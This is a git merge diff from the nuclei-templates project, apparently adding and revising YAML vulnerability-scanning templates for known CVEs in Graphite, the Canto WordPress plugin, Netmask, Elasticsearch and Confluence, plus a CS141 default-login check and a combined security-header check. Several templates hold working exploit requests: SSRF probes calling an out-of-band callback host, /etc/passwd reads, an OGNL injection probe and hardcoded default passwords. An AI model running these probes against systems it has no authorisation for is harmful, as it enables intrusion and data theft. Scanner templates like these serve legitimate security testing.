Merge branch 'master' of https://github.com/projectdiscovery/nuclei-templates into CVE-2015-7450-update

patch-1
sandeep 2021-09-04 14:41:03 +05:30
commit 94ba01f60d
16 changed files with 361 additions and 102 deletions

View File

@ -0,0 +1,24 @@
id: CVE-2017-18638
info:
name: Graphite 'graphite.composer.views.send_email' SSRF
author: huowuzhao
severity: high
description: send_email in graphite-web/webapp/graphite/composer/views.py in Graphite through 1.1.5 is vulnerable to SSRF. The vulnerable SSRF endpoint can be used by an attacker to have the Graphite web server request any resource. The response to this SSRF request is encoded into an image file and then sent to an e-mail address that can be supplied by the attacker. Thus, an attacker can exfiltrate any information.
reference:
- http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html
- https://github.com/graphite-project/graphite-web/issues/2008
- https://github.com/advisories/GHSA-vfj6-275q-4pvm
- https://nvd.nist.gov/vuln/detail/CVE-2017-18638
tags: cve,cve2017,graphite,ssrf,oob
requests:
- method: GET
path:
- '{{BaseURL}}/composer/send_email?to={{rand_text_alpha(4)}}@{{rand_text_alpha(4)}}&url=http://{{interactsh-url}}'
matchers:
- type: word
part: interactsh_protocol
words:
- "http"

View File

@ -18,7 +18,6 @@ requests:
matchers-condition: and
matchers:
- type: word
words:
- "phpmyadmin.net"

View File

@ -8,6 +8,8 @@ info:
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618
- https://seclists.org/fulldisclosure/2019/Mar/26
- https://www.exploit-db.com/exploits/46537
- https://nvd.nist.gov/vuln/detail/CVE-2019-9618
tags: cve,cve2019,wordpress,wp-plugin,lfi
requests:
@ -17,7 +19,6 @@ requests:
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"

View File

@ -0,0 +1,25 @@
id: CVE-2020-28976
info:
name: Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated)
author: LogicalHunter
severity: high
description: The Canto plugin 1.3.0 for WordPress contains a blind SSRF vulnerability. It allows an unauthenticated attacker can make a request to any internal and external server via /includes/lib/detail.php?subdomain=SSRF.
reference:
- https://www.exploit-db.com/exploits/49189
- https://nvd.nist.gov/vuln/detail/CVE-2020-28976
tags: cve,cve2020,ssrf,wordpress,wp-plugin,oob
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/canto/includes/lib/detail.php?subdomain={{interactsh-url}}"
- "{{BaseURL}}/wp-content/plugins/canto/includes/lib/get.php?subdomain={{interactsh-url}}"
- "{{BaseURL}}/wp-content/plugins/canto/includes/lib/tree.php?subdomain={{interactsh-url}}"
stop-at-first-match: true
matchers:
- type: word
part: interactsh_protocol
words:
- "http"

View File

@ -13,9 +13,6 @@ info:
- https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78
- https://www.hpe.com/us/en/home.html # vendor homepage
# This template exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution.
# The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability.
requests:
- method: GET
path:

View File

@ -0,0 +1,36 @@
id: CVE-2021-22145
info:
name: ElasticSearch 7.13.3 - Memory disclosure
author: dhiyaneshDk
severity: medium
description: A memory disclosure vulnerability was identified in Elasticsearch 7.10.0 to 7.13.3 error reporting. A user with the ability to submit arbitrary queries to Elasticsearch could submit a malformed query that would result in an error message returned containing previously used portions of a data buffer. This buffer could contain sensitive information such as Elasticsearch documents or authentication details.
reference:
- https://github.com/jaeles-project/jaeles-signatures/blob/e9595197c80521d64e31b846808095dd07c407e9/cves/elasctic-memory-leak-cve-2021-22145.yaml
- https://nvd.nist.gov/vuln/detail/CVE-2021-22145
- https://packetstormsecurity.com/files/163648/ElasticSearch-7.13.3-Memory-Disclosure.html
tags: cve,cve2021,elascticsearch
requests:
- method: POST
path:
- '{{BaseURL}}/_bulk'
headers:
Content-Type: application/json
body: |
@
matchers-condition: and
matchers:
- type: word
words:
- 'root_cause'
- 'truncated'
- 'reason'
part: body
condition: and
- type: status
status:
- 400

View File

@ -1,25 +1,40 @@
id: CVE-2021-26084
info:
author: dhiyaneshDk
author: dhiyaneshDk,philippedelteil
severity: critical
name: Confluence Server OGNL injection - RCE
description: In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if Allow people to sign up to create their account is enabled. To check whether this is enabled go to COG > User Management > User Signup Options. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.
tags: cve,cve2021,rce,confluence
reference:
- https://jira.atlassian.com/browse/CONFSERVER-67940
- https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md
- https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2021-26084
- https://nvd.nist.gov/vuln/detail/CVE-2021-26084
- https://github.com/Udyz/CVE-2021-26084
requests:
- raw:
- |
POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1
POST /{{path}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb
payloads:
path:
- pages/createpage-entervariables.action?SpaceKey=x
- confluence/pages/createpage-entervariables.action?SpaceKey=x
- wiki/pages/createpage-entervariables.action?SpaceKey=x
- pages/doenterpagevariables.action
- pages/createpage.action?spaceKey=myproj
- pages/templates2/viewpagetemplate.action
- pages/createpage-entervariables.action
- template/custom/content-editor
- templates/editor-preload-container
- users/user-dark-features
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status

View File

@ -0,0 +1,33 @@
id: CVE-2021-28918
info:
name: Netmask NPM Package SSRF
author: johnjhacking
severity: critical
description: Improper input validation of octal strings in netmask npm package allows unauthenticated remote attackers to perform indeterminate SSRF, RFI, and LFI attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts.
tags: cve,cve2021,npm,netmask,ssrf,lfi
reference:
- https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md
- https://nvd.nist.gov/vuln/detail/CVE-2021-28918
- https://github.com/advisories/GHSA-pch5-whg9-qr2r
requests:
- method: GET
path:
- "{{BaseURL}}/?url=http://0177.0.0.1/server-status"
- "{{BaseURL}}/?host=http://0177.0.0.1/server-status"
- "{{BaseURL}}/?file=http://0177.0.0.1/etc/passwd"
stop-at-first-match: true
matchers-condition: or
matchers:
- type: word
part: body
words:
- "Apache Server Status"
- "Server Version"
condition: and
- type: regex
regex:
- "root:.*:0:0:"

View File

@ -0,0 +1,65 @@
id: cs141-default-login
info:
name: CS141 SNMP Module Default Credentials
author: socketz
severity: medium
reference: https://www.generex.de/media/pages/packages/documents/manuals/f65348d5b6-1628841637/manual_CS141_en.pdf
tags: hiawatha,iot,default-login
requests:
- raw:
- |
POST /api/login HTTP/1.1
Host: {{Hostname}}
Content-Length: 44
Accept: application/json, text/plain, */*
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: en,es-ES;q=0.9,es;q=0.8
Connection: close
{"userName":"admin","password":"cs141-snmp"}
- |
POST /api/login HTTP/1.1
Host: {{Hostname}}
Content-Length: 44
Accept: application/json, text/plain, */*
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: en,es-ES;q=0.9,es;q=0.8
Connection: close
{"userName":"engineer","password":"engineer"}
- |
POST /api/login HTTP/1.1
Host: {{Hostname}}
Content-Length: 44
Accept: application/json, text/plain, */*
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: en,es-ES;q=0.9,es;q=0.8
Connection: close
{"userName":"guest","password":"guest"}
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
words:
- 'accessToken'
- 'application/json'
condition: and
part: header
- type: status
status:
- 200
extractors:
- type: kval
kval:
- accessToken

View File

@ -1,17 +0,0 @@
id: missing-csp
info:
name: CSP Not Enforced
author: geeknik
severity: info
description: Checks if there is a CSP header
tags: misc,generic
requests:
- method: GET
path:
- '{{BaseURL}}'
redirects: true
matchers:
- type: dsl
dsl:
- '!contains(tolower(all_headers), ''content-security-policy'')'

View File

@ -1,17 +0,0 @@
id: missing-hsts
info:
name: Strict Transport Security Not Enforced
author: Dawid Czarnecki
severity: info
description: Checks if the HSTS is enabled by looking for Strict Transport Security response header.
tags: misc,generic
requests:
- method: GET
path:
- '{{BaseURL}}'
redirects: true
matchers:
- type: dsl
dsl:
- '!contains(tolower(all_headers), ''strict-transport-security'')'

View File

@ -1,18 +0,0 @@
id: missing-x-content-type-options
info:
name: X-Content-Type-Options unidentified
author: G4L1T0 and @convisoappsec
severity: info
description: Check for X-Content-Type-Options header
tags: misc,generic
requests:
- method: GET
path:
- '{{BaseURL}}'
redirects: true
matchers:
- type: dsl
dsl:
- '!contains(tolower(all_headers), ''x-content-type-options'')'

View File

@ -1,19 +0,0 @@
id: missing-x-frame-options
info:
name: Clickjacking (Missing XFO header)
author: kurohost
severity: low
tags: misc,generic
requests:
- method: GET
path:
- "{{BaseURL}}"
redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- "!contains(tolower(all_headers), 'x-frame-options')"

View File

@ -0,0 +1,127 @@
id: http-missing-security-headers
info:
name: HTTP Missing Security Headers
author: socketz,geeknik,G4L1T0,convisoappsec,kurohost,dawid-czarnecki
severity: info
description: It searches missing security headers, but obviously, could be so less generic and could be useless for Bug Bounty.
tags: misconfig,generic
requests:
- method: GET
path:
- "{{BaseURL}}"
redirects: true
max-redirects: 3
matchers-condition: or
matchers:
- type: regex
name: strict-transport-security
regex:
- "(?i)strict-transport-security"
negative: true
part: header
- type: regex
name: content-security-policy
regex:
- "(?i)content-security-policy"
negative: true
part: header
- type: regex
name: x-frame-options
regex:
- "(?i)x-frame-options"
negative: true
part: header
- type: regex
name: x-content-type-options
regex:
- "(?i)x-content-type-options"
negative: true
part: header
- type: regex
name: x-permitted-cross-domain-policies
regex:
- "(?i)x-permitted-cross-domain-policies"
negative: true
part: header
- type: regex
name: referrer-policy
regex:
- "(?i)referrer-policy"
negative: true
part: header
- type: regex
name: clear-site-data
regex:
- "(?i)clear-site-data"
negative: true
part: header
- type: regex
name: cross-origin-embedder-policy
regex:
- "(?i)cross-origin-embedder-policy"
negative: true
part: header
- type: regex
name: cross-origin-opener-policy
regex:
- "(?i)cross-origin-opener-policy"
negative: true
part: header
- type: regex
name: cross-origin-resource-policy
regex:
- "(?i)cross-origin-resource-policy"
negative: true
part: header
- type: regex
name: access-control-allow-origin
regex:
- "(?i)access-control-allow-origin"
negative: true
part: header
- type: regex
name: access-control-allow-credentials
regex:
- "(?i)access-control-allow-credentials"
negative: true
part: header
- type: regex
name: access-control-expose-headers
regex:
- "(?i)access-control-expose-headers"
negative: true
part: header
- type: regex
name: access-control-max-age
regex:
- "(?i)access-control-max-age"
negative: true
part: header
- type: regex
name: access-control-allow-methods
regex:
- "(?i)access-control-allow-methods"
negative: true
part: header
- type: regex
name: access-control-allow-headers
regex:
- "(?i)access-control-allow-headers"

View File

@ -2,31 +2,39 @@ id: php_errors
info:
name: PHP errors
author: w4cky_
author: w4cky_,geeknik
severity: info
tags: debug
tags: debug,php
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
words:
- "Fatal error"
- "Call to undefined method"
- "You have an error in your SQL syntax;"
- "MySQL server version for the right syntax to use near"
- "PHP Warning"
- "PHP Error"
- "Warning: mysql_connect():"
- "Warning: mysql_query()"
- "Warning: pg_connect():"
- "failed to open stream: HTTP request failed"
- "SAFE MODE Restriction in effect."
- "Cannot modify header information"
- "ORA-00921: unexpected end of SQL command"
- "ORA-00933: SQL command not properly ended"
- "ORA-00936: missing expression"
- "ORA-12541: TNS:no listener"
extractors:
- type: regex
regex:
- '(?i)Fatal error'
- '(?i)Call to undefined method'
- '(?i)You have an error in your SQL syntax'
- '(?i)MySQL server version for the right syntax to use near'
- '(?i)MySQL cannot create a temporary file'
- '(?i)PHP (Warning|Error)'
- '(?i)Warning\: (pg|mysql)_(query|connect)\(\)'
- '(?i)failed to open stream\:'
- '(?i)SAFE MODE Restriction in effect'
- '(?i)Cannot modify header information'
- '(?i)ORA-00921\: unexpected end of SQL command'
- '(?i)ORA-00933\: SQL command not properly ended'
- '(?i)ORA-00936\: missing expression'
- '(?i)ORA-12541\: TNS\:no listener'
- '(?i)uncaught exception'
- '(?i)include_path'
- '(?i)undefined index'
- '(?i)undefined variable\:'
- '(?i)stack trace\:'
- '(?i)expects parameter [0-9]*'
- '(?i)Debug Trace'
- '(?i)(syntax|parse) error'
- '(?i)Allowed Memory Size of \d* Bytes Exhausted'
- '(?i)Maximum execution time of \d* seconds exceeded'

View File

@ -8,7 +8,7 @@ info:
A ZipSlip vulnerability in McAfee ePolicy Orchestrator (ePO)
is a type of Path Traversal occurring when archives are unpacked
if the names of the packed files are not properly sanitized.
An attacker can create archives with files containing “../” in their names,
An attacker can create archives with files containing "../" in their names,
making it possible to upload arbitrary files
to arbitrary directories or overwrite existing ones during archive extraction.
reference: